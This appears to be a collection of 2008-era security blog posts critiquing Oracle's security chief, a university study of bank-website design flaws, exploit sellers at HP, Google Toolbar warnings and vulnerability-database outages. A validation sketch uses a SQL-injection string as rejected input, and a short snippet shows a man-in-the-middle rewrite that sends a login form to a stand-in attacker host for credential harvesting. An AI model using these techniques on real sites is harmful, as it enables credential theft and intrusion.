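Applied properly, Rule No. 1 means every client-supplied value is re-validated on the server, no matter what the browser-side code promises. A minimal server-side allowlist sketch (hypothetical field and names, not anything from Oracle’s materials):

    import re

    # Hypothetical server-side allowlist check for an account-number field.
    # Client-side JavaScript may enforce the same format, but only this
    # check counts: the client is free to send anything at all.
    ACCOUNT_RE = re.compile(r"[0-9]{8,12}")

    def validate_account_number(value):
        if not ACCOUNT_RE.fullmatch(value):
            raise ValueError("invalid account number")
        return value

    print(validate_account_number("123456789"))   # accepted

    try:
        validate_account_number("1 OR 1=1--")     # hostile input
    except ValueError:
        print("rejected")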

2008, July/August

Mary Ann Davidson says Oracle has always been a security leader; I’m not sure by what definition, though. She says Oracle has developed “security-enforcing interfaces, such as input validation”, yet every quarter we see a new set of input-validation vulnerabilities. [Source]

“In the almost 20 years I have spent here, I have seen Oracle evolve from being a strong database company to one of the largest enterprise software companies in the world. We have always been security leaders, and not merely in security features and functions. We lead by broadly training our developers in secure coding practice. We lead by wide deployment of automated vulnerability detection tools (both third-party and homegrown). We’ve developed security-enforcing interfaces, such as input validation, without expecting every developer (or customer) to be a security expert.” — Mary Ann Davidson

2008, July 16

Oracle releases fixes for 45 security vulnerabilities. [Source]


The role of Chief Security Officer (CSO) is one of taking responsibility for the security of an organization or the products it sells. A CSO must demand quality from employees, provide continual training and ensure that processes keep improving to better integrate security into the product lifecycle. When a CSO becomes a mouthpiece for a company and is more interested in spin-control, shirking responsibility and toeing the company line, it is time for the company and its customers to evaluate the ethics of such a person and the need for such a position. Mary Ann Davidson is a professional spin-doctor and cannot be taken seriously as a CSO after the last ten years of her career.

Brief analysis of “Analyzing Websites for User-Visible Security Design Flaws”

[This was originally published on attrition.org]

On July 23, 2008, an article was released touting the numbers of a recent study on website security design flaws. The article quoted only some statistics from the research and did not link to it or explain how the statistics were derived. I posted a quick rebuttal to the Dataloss mail list calling the entire study into question. Without the full details, the statistics have no real meaning.

Shortly after the post, I was provided with a copy of the original research and was able to give a more thorough analysis of the paper. It is reproduced below, only altered for better formatting.


After being provided a link to the original paper and reading additional comments, I wanted to follow up on my original post with more thoughts. If you want the slightly more technical review, search down to “methodology review”. The paper in question is “Analyzing Websites for User-Visible Security Design Flaws” by Laura Falk, Atul Prakash and Kevin Borders. I strongly encourage more security professionals to provide peer scrutiny to security research coming from universities.

As was pointed out, the research was done in 2006 (testing in November/December) but the results are only now being published. Three people working on a study of 214 web sites should not take that long to publish. When research on a topic like this sits unpublished for so long, one must question whether it is responsible or, more to the point, still relevant. In the world of high-end custom banking applications, my experience consulting for such companies tells me that many commission periodic third-party audits and that these sites receive continuous improvements and changes every week. One of the web sites I use for personal banking has changed dramatically in the last 12 months, with huge changes to functionality and presumably to architecture, security and design. The results of a 2006 audit of that site are probably mostly irrelevant.

As with most research papers, the lack of a publication date in the header is annoying. The abstract does not mention the 2006-to-2008 gap between research and publication either. This time difference is seen almost immediately in the citation of Schechter et al. regarding people “disregarding SSL indicators”. The current releases of several browsers, most notably IE7 and Firefox 3, make pretty big shifts in how the browser handles and warns about SSL indicators. Each browser is considerably more paranoid and will throw a warning over discrepancies that previous versions would have ignored.

On page 1, Prakash et al. list the criteria for the categories of “design flaws” they examined. As expected, and as mentioned in my previous post, the design flaws they examined are not necessarily vulnerabilities; often they do not put customer data at risk, or they require additional prerequisites to be exploitable. To look at one of their design flaws as an example, consider the following:

Presenting secure login options on insecure pages: Some sites present login forms that forward to a secure page but do not come from a secure page. This is problematic because an attacker could modify the insecure page to submit login credentials to an insecure destination.

This summary of a design flaw is problematic in that it makes several assumptions and does not fully qualify the attack vector. First, to “modify” an insecure page being served from the bank to the user’s client (browser), the attacker would have to compromise the server (making this attack moot) or conduct a Man-in-the-Middle (MiTM) attack. I assume the latter is meant, since the implication is that an attacker could not effectively MiTM a page wrapped in encryption (SSL).

It is interesting that the lack of SSL encryption is chosen as a design flaw with the notion that manipulation of an insecure page is the preferred attack vector. Such an attack is considerably more difficult to conduct than other threats (e.g., SQL injection, privilege escalation) and would essentially target a single customer. Many large applications serving hundreds of thousands of users make this trade-off of mixed-security pages for performance reasons, as the overhead of encrypting all traffic can be costly.
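
To make the attack concrete, here is a schematic sketch (hypothetical URLs) of the one-attribute rewrite an on-path attacker would perform against an unencrypted login page:

    import re

    # Login form served over plain HTTP; the form itself posts to HTTPS.
    page = '<form action="https://bank.example.com/login" method="post">'

    # An on-path (MiTM) attacker rewrites one attribute in transit; the
    # user sees the same page but submits credentials to the attacker.
    tampered = re.sub(
        r'action="https://bank\.example\.com/login"',
        'action="http://attacker.example.net/harvest"',
        page,
    )
    print(tampered)
    # <form action="http://attacker.example.net/harvest" method="post">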

Later in the paper, when the team attempts to better define this design weakness, they say:

Consider the case where the customer service contact information for resetting passwords is provided on an insecure page. To compromise the system, an attacker only needs to spoof or modify the page, replacing the customer service phone numbers with bogus numbers.

Web pages can be spoofed regardless of the transport, so the presence of SSL encryption means little to nothing. If the team is implying an attacker “only need [..] modify the page”, that would require compromising the server or performing a MiTM attack. Again, this is not a trivial attack by any means and, in the latter case, would affect one customer.

While this is only one of five design flaws Prakash’s team looked for, consider the third example, which is the exact same design weakness:

Contact information/security advice on insecure pages: Some sites host their security recommendations, contact information, and various other sensitive information about their site and company on insecure pages. This is dangerous because an attacker could forge the insecure page and present different recommendations and contact information.

This is the exact same issue as #2 in the list, merely specifying the content on the page. Factor in that issue #1 will be more prevalent in large organizations but a non-issue in smaller ones, and the list of five design weaknesses is effectively cut down to four, with one that is unlikely to be seen on some of the sites tested at all.

The paper quickly summarizes its findings before going into detail, concluding: “Overall, only 24% of the sites were completely free of these design flaws, indicating that some of the flaws we identified are not widely understood, even among institutions where security is critical.” This assumption and conclusion are dangerous and irresponsible. The implication that the presence of one or more of these flaws indicates the site does not understand the threat is presumptuous. Given the example above about the high overhead of encrypting all content, some of the “design flaws” may be business decisions and acceptable risk.

Prakash et al. begin to demonstrate their lack of understanding of client-server relationships and the transport mechanisms for different protocols. The following paragraph from page 2 immediately calls the team’s technical competence into question:

One of the most interesting design flaws we discovered is the presentation of FAQs and contact information on insecure pages. In the past, FAQs and contact information were usually sent through the mail to the customer. It is not generally recognized that this information should be protected. However, when this information is presented online, the user becomes vulnerable to social engineering and offline attacks as a result of the information being displayed on an insecure page.

Prakash’s contention that unencrypted content delivered from a web server to a browser is somehow different from unencrypted content delivered from a mail server to a mail reader is silly. If an attacker has the ability to MiTM a person, the attack isn’t going to be limited to HTTP. Sending contact information via mail will result in a user deleting it or maybe storing it in a folder. The first time the person needs to contact the bank, they will check the web page for the contact information. If that information is not available, it further burdens the bank, as the customer may call a generic number and get transferred around several times. This adds to customer frustration and causes bank employees to spend extra time dealing with a customer who could have called the correct number to begin with.

Prakash’s team goes on to make more assumptions and to misunderstand how web clients behave. Without getting into a full discussion of the philosophy of e-commerce sites adding mechanisms to invalidate client-side vulnerabilities, the general notion that it should be done when feasible seems reasonable. In this context, feasible means that it doesn’t overly burden the bank web site, does not impact performance and is generally transparent to the end user. One example is a cross-frame spoofing issue that made it trivial for an attacker to use a phishing attack to MiTM MSIE 6 users. Web sites can add a small bit of JavaScript to help ensure that browsers load their pages in a new frame, essentially mitigating this risk. This is a good example of how many banks were helping protect customers, even though the vulnerability was in the customer’s software, not the bank web site. Prakash’s team claims:

Our work is similar in that some of the flaws that we consider impair a user’s ability to make correct security decisions. However, our work differs in that the cause is not poor or confusing client-side interfaces. Instead, the flaws originate in poor design or policy choices at the server that prevent or make it difficult for users to make correct choices from the perspective of securing their transactions.

While a mismatched SSL certificate used to be virtually ignored in some cases, new versions of popular browsers now behave differently in how they alert users, giving them the ability to more easily make correct choices. Claiming that this research is not impacted by “poor or confusing client-side interfaces” is misleading. While the older browsers were not necessarily confusing, they handled some situations regarding establishing trust poorly.

The next area of technology Prakash’s team doesn’t seem to fully understand is vulnerability scanners. In the paper his team says:

Network scanners, such as Nessus [11], and application-level website scanners, such as AppScan [17], can be used to analyze for many configuration and implementation bugs, such as use of unpatched services and vulnerability to cross-site scripting or SQL injection attacks. As far as we are aware, the design flaws that we examine are currently not identified by these scanners.

Both Nessus and AppScan will identify several vulnerabilities that directly relate to the design flaws outlined. Both will warn about invalid or expired SSL certificates; AppScan will warn about mixed-mode security pages; and neither will perform tests for some of the design flaws listed (#3, #4, #5), because no scanner in the world can do so.

Methodology Review:

On page 8 (of 10), the team gives very brief descriptions of their testing methodology. The lack of detail in the testing methodology undermines significant portions of the research. For “Break in the Chain of Trust”, the paper says “Under no circumstance should an insecure page make a transition to a security-sensitive website hosted on another domain, regardless of whether the destination site uses SSL.” This is an arbitrary ‘rule’ that is not widely accepted by anyone, including the banking industry. Many web pages are designed to act as portals that link to additional features. The ‘rule’ as quoted from the paper would force large bank organizations to consolidate all web resources on a single domain. While that may be nice, it simply isn’t feasible for many businesses, especially large organizations that include multiple companies. Linking from http://bigbank.com/ to https://regionalbank.com/ is perfectly acceptable and should use proper SSL certificates and technology controls to help ensure the user ends up on the correct page, loaded directly by the browser.

The second design weakness studied was “Presenting Secure Login Options on Insecure Pages”. The paper explains the methodology as “.. searched each web page for the string “login”. If the string was found, we searched the same page for the strings “username” or “user id” or “password”. If the string “login” and “username” or “user id” or “password” were found on the same page, we then verified whether the page was displayed using the HTTP protocol. If this was the case, we assumed this site contained the design flaw.” The key word here is ‘assumed’. There are scenarios where the above methodology could easily generate a false positive. Even back in 2006, there were trivial ways to determine the use of HTTPS with certainty.
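To illustrate, here is a minimal sketch of a more reliable check. This is my own hypothetical helper, written with today’s fetch API rather than anything available in 2006, but the logic was just as trivial then: only flag a page after confirming it actually contains a password field and was actually served over plain HTTP.

    // Hypothetical sketch, not the paper's tool: flag a page only if it
    // really collects a password and really arrived over plain HTTP.
    async function pageHasInsecureLoginForm(pageUrl: string): Promise<boolean> {
      const res = await fetch(pageUrl, { redirect: "follow" });
      const finalUrl = new URL(res.url); // protocol after any redirects
      const html = await res.text();

      // An actual password input is the signal that credentials are
      // collected here, not the mere presence of the word "password".
      const hasPasswordField = /<input[^>]+type=["']?password/i.test(html);

      return hasPasswordField && finalUrl.protocol === "http:";
    }

Even this trivial refinement eliminates the obvious false positives, such as an HTTP page that merely discusses logins or links to a separate HTTPS login page.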

The third design weakness studied was “Contact Information/Security Advice on Insecure Pages” and is perhaps the most technically lacking testing method one could perform:

We searched each web page for the string “contact”, “information”, or “FAQ”. If those strings where found, we checked whether the page was protected with SSL. If not, then we considered it to contain the design flaw.

The mere presence of these words on a site does not mean they appear in the context of listing bank contact information. While ‘contact’ will frequently link to a ‘contact us’ page, looking for ‘information’ or ‘FAQ’ is absurd.

For the fourth weakness, “Inadequate Policies for User IDs and Passwords”, the team openly admits that their methodology may produce “optimistic” results and that they had no way to verify their results “without generating an account on the website”. Heaven forbid they find a couple hundred students at the university to participate by logging into their personal banks and checking this in more detail. That extra effort would have made this portion the only rigorous and accurate test of the set. From the paper:

Our count could be optimistic; some sites may require strong passwords without stating an explicit policy. We had no obvious means of verifying this without generating an account on the website. Our count could also be conservative for sites that have poor policies resulting in weak passwords. Thus, our results for this design flaw should only be taken as a rough estimate of the extent of this particular problem.

As before, the fifth design weakness was extrapolated using a glorified ‘grep’ of the web page, analyzing the proximity of a few keywords and then verifying the hits above an 85% threshold. And as before, this testing methodology makes huge assumptions about the wording on the page, does not account for HTML formatting that distorts the ‘distance’ between words (especially in pages with frames) and does not begin to test the actual functionality (see page 9, section 4.5).
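To see why markup matters, consider this small TypeScript sketch; the keywords are illustrative stand-ins, not the paper’s actual terms. Two words that render adjacent to the user can be many ‘words’ apart in the raw HTML:

    // Naive word-distance measure of the kind a keyword-proximity
    // grep relies on; indexOf finds the first exact word match.
    function distanceInWords(text: string, a: string, b: string): number {
      const words = text.toLowerCase().split(/\s+/).filter((w) => w.length > 0);
      const i = words.indexOf(a);
      const j = words.indexOf(b);
      return i >= 0 && j >= 0 ? Math.abs(i - j) : -1;
    }

    // Adjacent in the rendered page, separated by markup in the source.
    const raw = 'email <span class="hint" style="color: gray;"><!-- tip --></span> password';
    const rendered = raw.replace(/<!--[\s\S]*?-->/g, " ").replace(/<[^>]*>/g, " ");

    console.log(distanceInWords(raw, "email", "password"));      // inflated by markup
    console.log(distanceInWords(rendered, "email", "password")); // 1, as the user sees it

Run against a frameset, where the visible text lives in entirely separate documents, the distortion is even worse.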

Finally, the paper attempts to interpret the results of this poorly conceived and improperly tested study. Table 1 on page 10 says that 30% of the sites tested were affected by “Break in the chain of trust”, but this is contradicted (or rather, clarified) in the first paragraph of the results:

With automated tools, such as the one used in our study, false positives are possible. To the extent feasible, we manually examined the results to eliminate false positives from the reported data. Our break-in-chain-of-trust data had a significant number of false positives. Our automated tool reported about 30% of the websites to potentially use third-party sites in an unsafe way, but only 17% were found to do so without giving some sort of notification to the user about that transition.

Having such an admittedly large margin of error, based on their own methodology, should be an eye-opener in regards to the integrity and accuracy of the results. Of the roughly 30% of sites flagged by the tool, only 17% were confirmed; in other words, (30 − 17) / 30, or roughly 43–44%, of the flagged sites were false positives. Despite this revelation, the next paragraph immediately cites the table with the 30% number and begins to draw conclusions from the bogus figures. They go on to further explain that their primary tool for gathering information (wget) may not have retrieved all of the information needed to properly assess the sites.

Despite the weak methodology, a roughly 44% error rate on at least one test and other admitted errors, Prakash et al. go on to say “We found that 76% of sites have at least one design flaw.” Such statements are certainly not factual, or even statistically sound, given the research presented.


Prakash followed up with a brief reply that was dismissive of my write-up and only called for more research of bank sites. What he failed to understand is that more research of this nature, with huge gaps and a lack of understanding of the subject matter, will only produce more statistics and articles that have no relevance or meaning to our industry. Worse, they serve to provide inaccurate information that can only lead to poor decisions by people with an interest in information security.

The Black Market Code Industry

[This was originally published on the OSVDB blog.]

Adam Penenberg wrote an article titled “The Black Market Code Industry” for FastCompany, in which he details his research into two HP employees who actively sold exploit code in their spare time, at least one of them selling exploits in HP’s own software. According to the article, HP knew about one of the employees at the time and was investigating. While a neat article and a fun read, it left me with a lot more questions that I hope get answered at some point (how about a ‘Part 2’, Adam?).

  1. Does Rigano still work for HP now that the article has been out a week?
  2. Did either individual have access to source code that would make their exploit writing easier? If so, did they have access to edit source code in any capacity (e.g., adding backdoors or vulnerable code)?
  3. Did Rigano actually sell his exploits? If so, to whom and for how much? Checking the Full-Disclosure list archives, he appears to have had exploits for IIS 6.0, Firefox 2.x, MSIE 7, SAP, Apache, Microsoft Office and more.
  4. If Rigano did sell vulnerabilities, did he vet his buyers, or could he have sold them to ‘enemy’ nations or hostile countries (relative terms, I know)?
  5. Why is the FBI investigating a France-based employee of HP?
  6. Is t0t0 a current employee of HP? If not, did he leave over his exploit-selling activities? The article suggests that HP is aware of one of the two sellers. What do they have to say about this article now?

Stop Using Google, It’s Dangerous!

[This was originally published on the OSVDB blog.]

Reported Phishing/Vulnerable Site! The web site http://www.google.com has been reported as a vulnerable site that may pose a threat to your web browsing. Vulnerable sites do not prioritize security and don’t care about their users and customers. These sites may pose a risk to you, exploit the trust between you and their site and may cause your computer to perform actions you did not approve.

To carry on the scary wording in the style of others: some web sites are high profile and may seem trustworthy, but you shouldn’t trust them at all. They are full of buggy code, don’t care about protecting their users (that’s you!) and generally suck. Despite using their site as a virtual crutch, you should clearly stay away from them unless it is to send nasty mails or mock them. Again, do not trust Google’s web sites or search engine, because they have been known to be vulnerable. What assholes!

On a more serious note, if anyone at Google is reading this, I hope you pass this on to the jackasses that develop Google Toolbar or whatever hook they use to integrate with Firefox. Not only is it worse than malware (every piece of software tries to get me to install it), it uses misleading wording to scare customers away from visiting perfectly safe and innocent web sites (namely, this blog). While it caters to morons, it doesn’t give users a real opportunity to learn why a site was ‘blocked’, other than vague wording in the diagnostic page.

My only guess as to why this warning occurs is an incident earlier this year, in which the OSVDB blog fell victim to a zero-day exploit in WordPress. I blogged about it at the time to make our readers aware and clear up any confusion. I assume that Google’s crawl of this blog noted the script code and subsequently declared us an “attack site”, even though that is hardly the case.

The discouraging part is that the “diagnostic page” says Google visited ONE page in the last 90 days and that 0 of those pages resulted in malicious software being downloaded. Google, if you are going to play Lord of the Browser, visit more than one page before you make that determination. To do anything less is a disservice to your users and a fast way to miss obvious malware. The third question mentions “intermediary”, which is technically accurate as far as the script code that was injected into a few blog posts. However, the big red warning says nothing about ‘intermediary’ and explicitly labels us as some kind of malware hosting site with the intent of attacking people. That is libelous, to say the least. Under ‘How did this happen’, Google mentions that sometimes third parties can inject such code, but doesn’t take the time to help clear this up. If the previous script injection issue is the cause of this, the fact that the script loaded content from a third-party domain (in China, no less) should be a good indication that WE did not host the malware. Sure, most users are dumb as a rock, but the few smart cookies who click for details should get just that… details.

[Image: what Google Toolbar users may see when visiting this blog.]

Finally, I opened this blog post by calling Google’s search engine a threat, and I was serious. Google has a track record of vulnerabilities far worse than OSVDB does, not only in their popular search engine, but in their various products too. Besides, their mechanism for reporting potentially dangerous sites is dubious, to say the least.

Update: It turns out we had another iframe injection into one of our posts (which has now been removed), and the hunt for how this is happening begins. That said, while Google’s warning that this site is “dangerous” may have been accurate, their mechanism of warning users in a vague manner (as shown in the image linked off ‘vague warning’) while not warning the site administrator is far from friendly. I can see that Google doesn’t care about warning sites of issues before warning the public, a far cry from ‘responsible disclosure’, something that Google pretends to care about:

This process of notifying a vendor before publicly releasing information is an industry-standard best practice known as responsible disclosure. Responsible disclosure is important to the ecology of the Internet. It allows companies like Google to keep users safe by fixing vulnerabilities and resolving security concerns before they are brought to the attention of the bad guys. We strongly encourage anyone who is interested in researching and reporting security issues to observe the simple courtesies and protocols of responsible disclosure.

Next time OSVDB is informed of a vulnerability that impacts Google products or services, I sure hope it doesn’t slip our mind to contact them. Perhaps the apparent race condition between the vague wording and the not-so-vague wording (below) that users may see constitutes a bug. If they can read this blog, they can see the bug in action and then contact us if they have more questions.

Update 2: Google apparently tried to send mail to our domain: “From: Google Search Quality”

VDBs Devolving?

[This was originally published on the OSVDB blog.]

I’m big on Vulnerability Database (VDB) evolution. I tend to harp on VDBs for not adding features, not making their data more accessible and generally doing the exact same thing they did ten years ago. While the target of my ire is typically functionality or usability, today it is a little more than that.

Last night I wanted to check for details on a CVE entry that was rather vague and had a single reference to BID. This is fairly common in the VDB world, as one database will add an entry whose only reference is another database (primarily Secunia or BID) rather than the original source of the data. As luck would have it, BID was down. Almost twelve hours later, their VDB is still down. What annoys me is that while they aren’t delivering vulnerability information, they sure are delivering advertisements. Why can’t VDBs get the same dedication and resources that ad farms get?

Next, I wanted to find out if the other VDBs had created an entry for the latest OpenBSD flap yet, so I went to X-Force, which is a pretty reliable database. Much to my dismay, it appears that the ‘advanced’ search is now gone. While it wasn’t extremely powerful, it let you do some basic sorting that was immensely helpful in finding what you needed. I have mail out to them asking for confirmation that it is indeed gone, versus a web geek error. I certainly hope it is the latter…

Update: Over 24 hours later, the BID database is finally available again. ISS has not replied to at least two mails from VDB managers asking about the missing advanced search feature.